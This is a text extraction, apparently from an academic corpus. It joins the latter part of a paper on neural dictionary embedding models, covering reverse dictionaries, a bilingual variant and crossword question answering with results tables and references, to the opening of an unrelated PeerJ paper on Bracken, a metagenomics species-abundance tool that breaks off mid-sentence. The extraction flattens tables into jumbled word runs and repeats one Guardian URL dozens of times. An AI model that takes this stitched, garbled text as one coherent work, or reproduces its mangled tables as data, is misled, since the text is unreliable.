4:stepson 3:might 4:that 3:annoyance 4:rudeness 3:foible 4:unfaithfulness your spouse” 5:stepchild 5:either 5:boorishness 5:adulterous Table 3: The top-five candidates for example queries (invented by the authors) from different reverse dictionary mod- els. Both the RNN and BOW models are without Word2Vec input and use the cosine loss. Input description RNN EN-FR W2V add RNN + Google ”an emotion that you might feel triste, pitoyable insister, effectivement sentiment, regretter after being rejected” répugnante, épouvantable pourquoi, nous peur, aversion ”a small black flying insect that mouche, canard attentivement, pouvions voler, faucon transmits disease and likes horses” hirondelle, pigeon pourrons, naturellement mouches, volant Table 4: Responses from cross-lingual reverse dictionary models to selected queries. Underlined responses are ‘cor- rect’ or potentially useful for a native French speaker. problem of attaching appropriate words to concepts may be more common when searching for words in a second language than in a monolingual context. To create the bilingual variant, we simply replace the Word2Vec target embeddings with those from a bilingual embedding space. Bilingual embedding models use bilingual corpora to learn a space of rep- resentations of the words in two languages, such that words from either language that have similar meanings are close together (Hermann and Blun- som, 2013; Chandar et al., 2014; Gouws et al., 2014). For a test-of-concept experiment, we used English-French embeddings learned by the state-of- the-art BilBOWA model (Gouws et al., 2014) from the Wikipedia (monolingual) and Europarl (bilin- gual) corpora.12 We trained the RNN model to map from English definitions to English words in the bilingual space. At test time, after reading an En- glish definition, we then simply return the nearest French word neighbours to that definition. Because no benchmarks exist for quantitative 12The approach should work with any bilingual embeddings. We thank Stephan Gouws for doing the training. evaluation of bilingual reverse dictionaries, we com- pare this approach qualitatively with two alternative methods for mapping definitions to words across languages. The first is analogous to the W2V Add model of the previous section: in the bilingual em- bedding space, we first compose the embeddings of the English words in the query definition with ele- mentwise addition, and then return the French word whose embedding is nearest to this vector sum. The second uses the RNN monolingual reverse dictio- nary model to identify an English word from an En- glish definition, and then translates that word using Google Translate. Table 4 shows that the RNN model can be ef- fectively modified to create a cross-lingual reverse dictionary. It is perhaps unsurprising that the W2V Add model candidates are generally the lowest in quality given the performance of the method in the monolingual setting. In comparing the two RNN- based methods, the RNN (embedding space) model appears to have two advantages over the RNN + Google approach. First, it does not require on- line access to a bilingual word-word mapping as 24 defined e.g. by Google Translate. Second, it less prone to errors caused by word sense ambiguity. For example, in response to the query an emotion you feel after being rejected, the bilingual embed- ding RNN returns emotions or adjectives describing mental states. In contrast, the monolingual+Google model incorrectly maps the plausible English re- sponse regret to the verbal infinitive regretter. The model makes the same error when responding to a description of a fly, returning the verb voler (to fly). 3.7 Discussion We have shown that simply training RNN or BOW NLMs on six dictionaries yields a reverse dictionary that performs comparably to the leading commer- cial system, even with access to much less dictio- nary data. Indeed, the embedding models consis- tently return syntactically and semantically plausi- ble responses, which are generally part of a more coherent and homogeneous set of candidates than those produced by the commercial systems. We also showed how the architecture can be easily extended to produce bilingual versions of the same model. In the analyses performed thus far, we only test the dictionary embedding approach on tasks that it was trained to accomplish (mapping definitions or descriptions to words). In the next section, we ex- plore whether the knowledge learned by dictionary embedding models can be effectively transferred to a novel task. 4 General Knowledge (crossword) Question Answering The automatic answering of questions posed in nat- ural language is a central problem of Artificial In- telligence. Although web search and IR techniques provide a means to find sites or documents related to language queries, at present, internet users requiring a specific fact must still sift through pages to locate the desired information. Systems that attempt to overcome this, via fully open-domain or general knowledge question- answering (open QA), generally require large teams of researchers, modular design and powerful infras- tructure, exemplified by IBM’s Watson (Ferrucci et al., 2010). For this reason, much academic re- search focuses on settings in which the scope of the task is reduced. This has been achieved by restrict- ing questions to a specific topic or domain (Mollá and Vicedo, 2007), allowing systems access to pre- specified passages of text from which the answer can be inferred (Iyyer et al., 2014; Weston et al., 2015), or centering both questions and answers on a partic- ular knowledge base (Berant and Liang, 2014; Bor- des et al., 2014). In what follows, we show that the dictionary em- bedding models introduced in the previous sections may form a useful component of an open QA sys- tem. Given the absence of a knowledge base or web-scale information in our architecture, we nar- row the scope of the task by focusing on general knowledge crossword questions. General knowl- edge (non-cryptic, or quick) crosswords appear in national newspapers in many countries. Crossword question answering is more tractable than general open QA for two reasons. First, models know the length of the correct answer (in letters), reducing the search space. Second, some crossword questions mirror definitions, in that they refer to fundamental properties of concepts (a twelve-sided shape) or re- quest a category member (a city in Egypt).13 4.1 Evaluation General Knowledge crossword questions come in different styles and forms. We used the Eddie James crossword website to compile a bank of sentence- like general-knowledge questions.14 Eddie James is one of the UK’s leading crossword compilers, work- ing for several national newspapers. Our long ques- tion set consists of the first 150 questions (starting from puzzle #1) from his general-knowledge cross- words, excluding clues of fewer than four words and those whose answer was not a single word (e.g. kingjames). To evaluate models on a different type of clue, we also compiled a set of shorter questions based on the Guardian Quick Crossword. Guardian questions still require general factual or linguistic knowledge, but are generally shorter and somewhat more cryptic than the longer Eddie James clues. We again formed 13As our interest is in the language understanding, we do not address the question of fitting answers into a grid, which is the main concern of end-to-end automated crossword solvers (Littman et al., 2002). 14http://www.eddiejames.co.uk/ 25 http://www.eddiejames.co.uk/ a list of 150 questions, beginning on 1 January 2015 and excluding any questions with multiple-word an- swers. For clear contrast, we excluded those few questions of length greater than four words. Of these 150 clues, a subset of 30 were single-word clues. All evaluation datasets are available online with the paper. As with the reverse dictionary experiments, can- didates are extracted from models by inputting def- initions and returning words corresponding to the closest embeddings in the target space. In this case, however, we only consider candidate words whose length matches the length specified in the clue. Test set Word Description Long Baudelaire ”French poet (150) and key figure in the development of Symbolism.” Short (120) satanist ”devil devotee” Single-Word (30) guilt ”culpability” Table 5: Examples of the different question types in the crossword question evaluation dataset. 4.2 Benchmarks and Comparisons As with the reverse dictionary experiments, we com- pare RNN and BOW NLMs with a simple unsuper- vised baseline of elementwise addition of Word2Vec vectors in the embedding space (we discard the in- effective W2V mult baseline), again restricting can- didates to words of the pre-specified length. We also compare to two bespoke online crossword- solving engines. The first, One Across (http: //www.oneacross.com/) is the candidate gen- eration module of the award-winning Proverb cross- word system (Littman et al., 2002). Proverb, which was produced by academic researchers, has featured in national media such as New Scientist, and beaten expert humans in crossword solving tournaments. The second comparison is with Crossword Maestro (http://www.crosswordmaestro.com/), a commercial crossword solving system that handles both cryptic and non-cryptic crossword clues (we focus only on the non-cryptic setting), and has also been featured in national media.15 We are unable 15 See e.g. http://www.theguardian.com/ crosswords/crossword-blog/2012/mar/08/ to compare against a third well-known automatic crossword solver, Dr Fill (Ginsberg, 2011), because code for Dr Fill’s candidate-generation module is not readily available. As with the RNN and base- line models, when evaluating existing systems we discard candidates whose length does not match the length specified in the clue. Certain principles connect the design of the ex- isting commercial systems and differentiate them from our approach. Unlike the NLMs, they each re- quire query-time access to large databases contain- ing common crossword clues, dictionary definitions, the frequency with which words typically appear as crossword solutions and other hand-engineered and task-specific components (Littman et al., 2002; Ginsberg, 2011). 4.3 Results The performance of models on the various question types is presented in Table 6. When evaluating the two commercial systems, One Across and Cross- word Maestro, we have access to web interfaces that return up to approximately 100 candidates for each query, so can only reliably record membership of the top ten (accuracy@10). On the long questions, we observe a clear advan- tage for all dictionary embedding models over the commercial systems and the simple unsupervised baseline. Here, the best performing NLM (RNN with Word2Vec input embeddings and ranking loss) ranks the correct answer third on average, and in the top-ten candidates over 60% of the time. As the questions get shorter, the advantage of the embedding models diminishes. Both the unsu- pervised baseline and One Across answer the short questions with comparable accuracy to the RNN and BOW models. One reason for this may be the differ- ence in form and style between the shorter clues and the full definitions or encyclopedia sentences in the dictionary training data. As the length of the clue de- creases, finding the answer often reduces to generat- ing synonyms (culpability - guilt), or category mem- bers (tall animal - giraffe). The commercial systems can retrieve good candidates for such clues among their databases of entities, relationships and com- mon crossword answers. Unsupervised Word2Vec crossword-blog-computers-crack-cryptic- clues 26 http://www.oneacross.com/ http://www.oneacross.com/ http://www.crosswordmaestro.com/ http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues http://www.theguardian.com/crosswords/crossword-blog/2012/mar/08/crossword-blog-computers-crack-cryptic-clues Question Type avg rank -accuracy@10/100 - rank variance Long (150) Short (120) Single-Word (30) One Across .39 / .68 / .70 / Crossword Maestro .27 / .43 / .73 / W2V add 42 .31/.63 92 11 .50/.78 66 2 .79/.90 45 RNN cosine 15 .43/.69 108 22 .39/.67 117 72 .31/.52 187 RNN w2v cosine 4 .61/.82 60 7 .56/.79 60 12 .48/.72 116 RNN ranking 6 .58/.84 48 10 .51/.73 57 12 .48/.69 67 RNN w2v ranking 3 .62/.80 61 8 .57/.78 49 12 .48/.69 114 BOW cosine 4 .60/.82 54 7 .56/.78 51 12 .45/.72 137 BOW w2v cosine 4 .60/.83 56 7 .54/.80 48 3 .59/.79 111 BOW ranking 5 .62/.87 50 8 .58/.83 37 8 .55/.79 39 BOW w2v ranking 5 .60/.86 48 8 .56/.83 35 4 .55/.83 43 Table 6: Performance of different models on crossword questions of different length. The two commercial systems are evaluated via their web interface so only accuracy@10 can be reported in those cases. representations are also known to encode these sorts of relationships (even after elementwise addition for short sequences of words) (Mikolov et al., 2013). This would also explain why the dictionary embed- ding models with pre-trained (Word2Vec) input em- beddings outperfom those with learned embeddings, particularly for the shortest questions. 4.4 Qualitative Analysis A better understanding of how the different models arrive at their answers can be gained from consider- ing specific examples, as presented in Table 7. The first three examples show that, despite the apparently superficial nature of its training data (definitions and introductory sentences) embedding models can an- swer questions that require factual knowledge about people and places. Another notable characteristic of these model is the consistent semantic appropriate- ness of the candidate set. In the first case, the top five candidates are all mountains, valleys or places in the Alps; in the second, they are all biblical names. In the third, the RNN model retrieves currencies, in this case performing better than the BOW model, which retrieves entities of various type associated with the Netherlands. Generally speaking (as can be observed by the web demo), the ‘smoothness’ or consistency in candidate generation of the dictionary embedding models is greater than that of the com- mercial systems. Despite its simplicity, the unsuper- vised W2V addition method is at times also surpris- ingly effective, as shown by the fact that it returns Joshua in its top candidates for the third query. The final example in Table 7 illustrates the sur- prising power of the BOW model. In the training data there is a single definition for the correct an- swer Schoenberg: United States composer and musi- cal theorist (born in Austria) who developed atonal composition. The only word common to both the query and the definition is ’composer’ (there is no tokenization that allows the BOW model to directly connect atonal and atonality). Nevertheless, the model is able to infer the necessary connections be- tween the concepts in the query and the definition to return Schoenberg as the top candidate. Despite such cases, it remains an open question whether, with more diverse training data, the world knowledge required for full open QA (e.g. sec- ondary facts about Schoenberg, such as his fam- ily) could be encoded and retained as weights in a (larger) dynamic network, or whether it will be nec- essary to combine the RNN with an external mem- ory that is less frequently (or never) updated. This latter approach has begun to achieve impressive re- sults on certain QA and entailment tasks (Bordes et al., 2014; Graves et al., 2014; Weston et al., 2015). 5 Conclusion Dictionaries exist in many of the world’s languages. We have shown how these lexical resources can con- stitute valuable data for training the latest neural lan- guage models to interpret and represent the mean- ing of phrases and sentences. While humans use 27 Input Description One Across Crossword Maestro BOW RNN ”Swiss mountain 1:noted 2:front 1:after 2:favor 1:Eiger 2.Crags 1:Eiger 2:Aosta peak famed for its 3:Eiger 4:crown 3:ahead 4:along 3:Teton 4:Cerro 3:Cuneo 4:Lecco north face (5)” 5:fount 5:being 5:Jebel 5:Tyrol ”Old Testament 1:Joshua 2:Exodus 1:devise 2:Daniel 1:Isaiah 2:Elijah 1:Joshua 2:Isaiah successor to 3:Hebrew 4:person 3:Haggai 4: Isaiah 3:Joshua 4:Elisha 3:Gideon 4:Elijah Moses (6)” 5:across 5:Joseph 5:Yahweh 5:Yahweh ”The former 1:Holland 2:general 1:Holland 2:ancient 1:Guilder 2:Holland 1:Guilder 2:Escudos currency of the 3:Lesotho 3:earlier 4:onetime 3:Drenthe 4:Utrecht 3:Pesetas 4:Someren Netherlands 5:qondam 5:Naarden 5:Florins (7)” ”Arnold, 20th 1:surrealism 1:disharmony 1:Schoenberg 1:Mendelsohn Century composer 2:laborparty 2:dissonance 2:Christleib 2:Williamson pioneer of 3:tonemusics 3:bringabout 3:Stravinsky 3:Huddleston atonality 4:introduced 4:constitute 4:Elderfield 4:Mandelbaum (10)” 5:Schoenberg 5:triggeroff 5:Mendelsohn 5:Zimmerman Table 7: Responses from different models to example crossword clues. In each case the model output is filtered to exclude any candidates that are not of the same length as the correct answer. BOW and RNN models are trained without Word2Vec input embeddings and cosine loss. the phrasal definitions in dictionaries to better un- derstand the meaning of words, machines can use the words to better understand the phrases. We used two dictionary embedding architectures - a recurrent neural network architecture with a long-short-term memory, and a simpler linear bag-of-words model - to explicitly exploit this idea. On the reverse dictionary task that mirrors its training setting, NLMs that embed all known con- cepts in a continuous-valued vector space perform comparably to the best known commercial applica- tions despite having access to many fewer defini- tions. Moreover, they generate smoother sets of can- didates and require no linguistic pre-processing or task-specific engineering. We also showed how the description-to-word objective can be used to train models useful for other tasks. NLMs trained on the same data can answer general-knowledge crossword questions, and indeed outperform commercial sys- tems on questions containing more than four words. While our QA experiments focused on crosswords, the results suggest that a similar embedding-based approach may ultimately lead to improved output from more general QA and dialog systems and in- formation retrieval engines in general. We make all code, training data, evaluation sets and both of our linguistic tools publicly available on- line for future research. In particular, we propose the reverse dictionary task as a comparatively general- purpose and objective way of evaluating how well models compose lexical meaning into phrase or sen- tence representations (whether or not they involve training on definitions directly). In the next stage of this research, we will ex- plore ways to enhance the NLMs described here, especially in the question-answering context. The models are currently not trained on any question- like language, and would conceivably improve on exposure to such linguistic forms. We would also like to understand better how BOW models can per- form so well with no ‘awareness’ of word order, and whether there are specific linguistic contexts in which models like RNNs or others with the power to encode word order are indeed necessary. Finally, we intend to explore ways to endow the model with richer world knowledge. This may require the in- tegration of an external memory module, similar to the promising approaches proposed in several recent papers (Graves et al., 2014; Weston et al., 2015). Acknowledgments KC and YB acknowledge the support of the follow- ing organizations: NSERC, Calcul Québec, Com- pute Canada, the Canada Research Chairs and CI- 28 FAR. FH and AK were supported by Google Faculty Research Award, and AK further by Google Euro- pean Fellowship. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceeding of ICLR. Yoshua Bengio, Patrice Simard, and Paolo Frasconi. 1994. Learning long-term dependencies with gradient descent is difficult. Neural Networks, IEEE Transac- tions on, 5(2):157–166. Jonathan Berant and Percy Liang. 2014. Semantic pars- ing via paraphrasing. In Proceedings of the Associa- tion for Computational Linguistics. James Bergstra, Olivier Breuleux, Frédéric Bastien, Pas- cal Lamblin, Razvan Pascanu, Guillaume Desjardins, Joseph Turian, David Warde-Farley, and Yoshua Ben- gio. 2010. Theano: a CPU and GPU math expression compiler. In Proceedings of the Python for Scientific Computing Conference (SciPy). Slaven Bilac, Timothy Baldwin, and Hozumi Tanaka. 2003. Improving dictionary accessibility by maximiz- ing use of available knowledge. Traitement Automa- tique des Langues, 44(2):199–224. Slaven Bilac, Wataru Watanabe, Taiichi Hashimoto, Takenobu Tokunaga, and Hozumi Tanaka. 2004. Dic- tionary search based on the target word description. In Proceedings of NLP 2014. Antoine Bordes, Sumit Chopra, and Jason Weston. 2014. Question answering with subgraph embeddings. Pro- ceedings of EMNLP. Antoine Bordes, Nicolas Usunier, Sumit Chopra, and Jason Weston. 2015. Large-scale simple question answering with memory networks. arXiv preprint arXiv:1506.02075. Sarath Chandar, Stanislas Lauly, Hugo Larochelle, Mitesh Khapra, Balaraman Ravindran, Vikas C. Raykar, and Amrita Saha. 2014. An autoencoder ap- proach to learning bilingual word representations. In Advances in Neural Information Processing Systems, pages 1853–1861. Kyunghyun Cho, Bart Van Merriënboer, Caglar Gul- cehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase representations using RNN encoder-decoder for statis- tical machine translation. In Proceedings of EMNLP. Manaal Faruqui, Jesse Dodge, Sujay K. Jauhar, Chris Dyer, Eduard Hovy, and Noah A. Smith. 2014. Retrofitting word vectors to semantic lexicons. Pro- ceedings of the North American Chapter of the Asso- ciation for Computational Linguistics. David Ferrucci, Eric Brown, Jennifer Chu-Carroll, James Fan, David Gondek, Aditya A. Kalyanpur, Adam Lally, J. William Murdock, Eric Nyberg, John Prager, Nico Schlaefer, and Chris Welty. 2010. Building Wat- son: An overview of the DeepQA project. In AI mag- azine, volume 31(3), pages 59–79. Matthew L. Ginsberg. 2011. Dr. FILL: Crosswords and an implemented solver for singly weighted CSPs. In Journal of Artificial Intelligence Research, pages 851– 886. Stephan Gouws, Yoshua Bengio, and Greg Corrado. 2014. BilBOWA: Fast bilingual distributed represen- tations without word alignments. In Proceedings of NIPS Deep Learning Workshop. Alex Graves, Greg Wayne, and Ivo Danihelka. 2014. Neural turing machines. arXiv preprint arXiv:1410.5401. Karl Moritz Hermann and Phil Blunsom. 2013. Multi- lingual distributed representations without word align- ment. In Proceedings of ICLR. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural computation, 9(8):1735– 1780. Eric H. Huang, Richard Socher, Christopher D. Manning, and Andrew Y. Ng. 2012. Improving word representa- tions via global context and multiple word prototypes. In Proceedings of the Association for Computational Linguistics. Mohit Iyyer, Jordan Boyd-Graber, Leonardo Claudino, Richard Socher, and Hal Daumé III. 2014. A neu- ral network for factoid question answering over para- graphs. In Proceedings of EMNLP. Mohit Iyyer, Varun Manjunatha, Jordan Boyd-Graber, and Hal Daumé III. 2015. Deep unordered compo- sition rivals syntactic methods for text classification. In Proceedings of the Association for Computational Linguistics. Ryan Kiros, Ruslan Salakhutdinov, and Richard S. Zemel. 2015. Unifying visual-semantic embeddings with multimodal neural language models. Transac- tions of the Association for Computational Linguistics. to appear. Alexandre Klementiev, Ivan Titov, and Binod Bhattarai. 2012. Inducing crosslingual distributed representa- tions of words. Proceedings of COLING. Geoffrey Leech, Roger Garside, and Michael Bryant. 1994. CLAWS4: The tagging of the British National Corpus. In Proceedings of COLING. Michael L. Littman, Greg A. Keim, and Noam Shazeer. 2002. A probabilistic approach to solving crossword puzzles. Artificial Intelligence, 134(1):23–55. Tomas Mikolov, Martin Karafiát, Lukas Burget, Jan Cer- nockỳ, and Sanjeev Khudanpur. 2010. Recurrent neu- 29 ral network based language model. In Proceedings of INTERSPEECH 2010. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In Advances in Neural Information Processing Systems. Jeff Mitchell and Mirella Lapata. 2010. Composition in distributional models of semantics. Cognitive Science, 34(8):1388–1429. Diego Mollá and José Luis Vicedo. 2007. Question an- swering in restricted domains: An overview. Compu- tational Linguistics, 33(1):41–61. Ryan Shaw, Anindya Datta, Debra VanderMeer, and Kaushik Dutta. 2013. Building a scalable database- driven reverse dictionary. Knowledge and Data Engi- neering, IEEE Transactions on, 25(3):528–540. Ivan Vulic, Wim De Smet, and Marie-Francine Moens. 2011. Identifying word translations from comparable corpora using latent topic models. In Proceedings of the Association for Computational Linguistics. Jason Weston, Antoine Bordes, Sumit Chopra, and Tomas Mikolov. 2015. Towards AI-complete question answering: A set of prerequisite toy tasks. In arXiv preprint arXiv:1502.05698. Matthew D. Zeiler. 2012. Adadelta: An adaptive learn- ing rate method. In arXiv preprint arXiv:1212.5701. Michael Zock and Slaven Bilac. 2004. Word lookup on the basis of associations: From an idea to a roadmap. In Proceedings of the ACL Workshop on Enhancing and Using Electronic Dictionaries. 30 work_pov3luuevzcuvon3rcd2obvd2e ---- Submitted 7 July 2016 Accepted 28 November 2016 Published 2 January 2017 Corresponding author Jennifer Lu, jlu26@jhmi.edu Academic editor James Procter Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.104 Copyright 2017 Lu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Bracken: estimating species abundance in metagenomics data Jennifer Lu1,2, Florian P. Breitwieser2, Peter Thielen3 and Steven L. Salzberg1,2,4 1 Department of Biomedical Engineering, Johns Hopkins University, Baltimore, MD, United States 2 Center for Computational Biology, McKusick-Nathans Institute of Genetic Medicine, Johns Hopkins School of Medicine, Baltimore, MD, United States 3 Applied Physics Laboratory, Johns Hopkins University, Laurel, MD, United States 4 Departments of Computer Science and Biostatistics, Johns Hopkins University, Baltimore, MD, United States ABSTRACT Metagenomic experiments attempt to characterize microbial communities using high-throughput DNA sequencing. Identification of the microorganisms in a sample provides information about the genetic profile, population structure, and role of microorganisms within an environment. Until recently, most metagenomics studies focused on high-level characterization at the level of phyla, or alternatively sequenced the 16S ribosomal RNA gene that is present in bacterial species. As the cost of sequencing has fallen, though, metagenomics experiments have increasingly used unbiased shotgun sequencing to capture all the organisms in a sample. This approach requires a method for estimating abundance directly from the raw read data. Here we describe a fast, accurate new method that computes the abundance at the species level using the reads collected in a metagenomics experiment. Bracken (Bayesian Reestimation of Abundance after Classification with KrakEN) uses the taxonomic assignments made by Kraken, a very fast read-level classifier, along with information about the genomes themselves to estimate abundance at the species level, the genus level, or above. We demonstrate that Bracken can produce accurate species- and genus-level abundance estimates even when a sample contains multiple near-identical species. Subjects Bioinformatics, Computational Biology Keywords Metagenomics, Species abundance, Microbiome, Bayesian estimation INTRODUCTION Metagenomics is a rapidly growing field of study, driven in part by our ability to generate enormous amounts of DNA sequence rapidly and inexpensively. Since the human genome was first published in 2001 (The International Human Genome Sequencing Consortium, 2001; Venter et al., 2001), sequencing technology has become approximately one million times faster and cheaper, making it possible for individual labs to generate as much sequence data as the entire Human Genome Project in just a few days. In the context of metagenomics experiments, this makes it possible to sample a complex mixture of microbes by ‘‘shotgun’’ sequencing, which involves simply isolating DNA, preparing the DNA for sequencing, and sequencing the mixture as deeply as possible. Shotgun sequencing is relatively unbiased compared to targeted sequencing methods (Venter et al., 2004), including widely-used 16S ribosomal RNA sequencing, and it has the additional advantage that it captures any species How to cite this article Lu et al. (2017), Bracken: estimating species abundance in metagenomics data. PeerJ Comput. Sci. 3:e104; DOI 10.7717/peerj-cs.104 https://peerj.com mailto:jlu26@jhmi.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.104 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.104 with a DNA-based genome, including eukaryotes that lack a 16S rRNA gene. Because it is unbiased, shotgun sequencing can also be used to estimate the abundance of each taxon (species, genus, phylum, etc.) in the original sample, by counting the number of reads belonging to each taxon. Along with the technological advances, the number of finished and draft genomes has also grown exponentially over the past decade. At present there are thousands of complete bacterial genomes, 20,000 draft bacterial genomes, and 80,000 full or partial virus genomes in the public GenBank archive (Benson et al., 2015). This rich resource of sequenced genomes now makes it possible to sequence uncultured, unprocessed microbial DNA from almost any environment, ranging from soil to the deep ocean to the human body, and use computational sequence comparisons to identify many of the formerly hidden species in these environments (Riesenfeld, Schloss & Handelsman, 2004). Several accurate methods have appeared that can align a sequence ‘‘read’’ to a database of microbial genomes rapidly and accurately (see below), but this step alone is not sufficient to estimate how much of a species is present. Complications arise when closely related species are present in the same sample–a situation that arises quite frequently–because many reads align equally well to more than one species. This requires a separate abundance estimation algorithm to resolve. In this paper, we describe a new method, Bracken, that goes beyond simply classifying individual reads and computes the abundance of species, genera, or other taxonomic categories from the DNA sequences collected in a metagenomics experiment. When it was first published in 2014, the Kraken metagenomics classifier represented a major enhancement in the speed with which large metagenomics sequence data could be processed (Wood & Salzberg, 2014), running over 900 times faster than MegaBlast (Morgulis et al., 2008), the closest competitor at the time. Kraken’s success and accuracy rely on its use of a very large, efficient index of short sequences of length k, which it builds into a specialized database. If k is chosen appropriately, then most sequences of length k in the database will be unique to a single species, and many will also be unique to a particular strain or genome. Larger values of k will yield a database in which even more of each genome is uniquely covered by k-mers; obviously, though, k should not be longer than the length of a sequencing read, and metagenomics projects currently generate reads as short as 75–100 base pairs (bp). Longer k-mers are also more likely to contain errors, meaning that more reads will be left unclassified if k is too long. Smaller k-mers, in contrast, will yield higher sensitivity because the minimum match length is shorter. When used to identify the taxonomic label of metagenomics sequences, the Kraken system for classification of metagenomics sequences is extremely fast and accurate (Wood & Salzberg, 2014). When classifying raw sequence reads, though, many reads correspond to identical regions between two or more genomes. (The number of such ambiguous reads decreases as reads get longer.) Kraken solves this problem by labeling the sequence with the lowest common ancestor (LCA) of all species that share that sequence, as discussed further below. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.104 Ambiguity among microbial species and strains As the database of bacterial genomes has grown, an increasing number of genomes share large portions of their sequence with other genomes. In many cases, these genomes are nearly identical; indeed, sequencing has revealed to scientists that many formerly distinct species and genera are far closer than were known prior to sequencing. Many species have been renamed as a result, in a process that is continual and ongoing, but many other species have retained their old names, often for historical or other reasons. For example, the species Mycobacterium bovis is over 99.95% identical to Mycobacterium tuberculosis (Garnier et al., 2003), and many cases of human tuberculosis are caused by M. bovis (which also infects cows) rather than M. tuberculosis (Grange, 2001). Their high sequence identity indicates that they should be considered as two strains of a single species, but they retain different species names. As a compromise, taxonomists have created the category Mycobacterium tuberculosis complex (Brosch et al., 2002) to represent a collection of taxa that now includes more than 100 strains of five different species. This category sits above the species level but below the genus level in the current microbial taxonomy, but it can best be described as a species. Other examples are numerous and still growing. The three species Bacillus anthracis (the 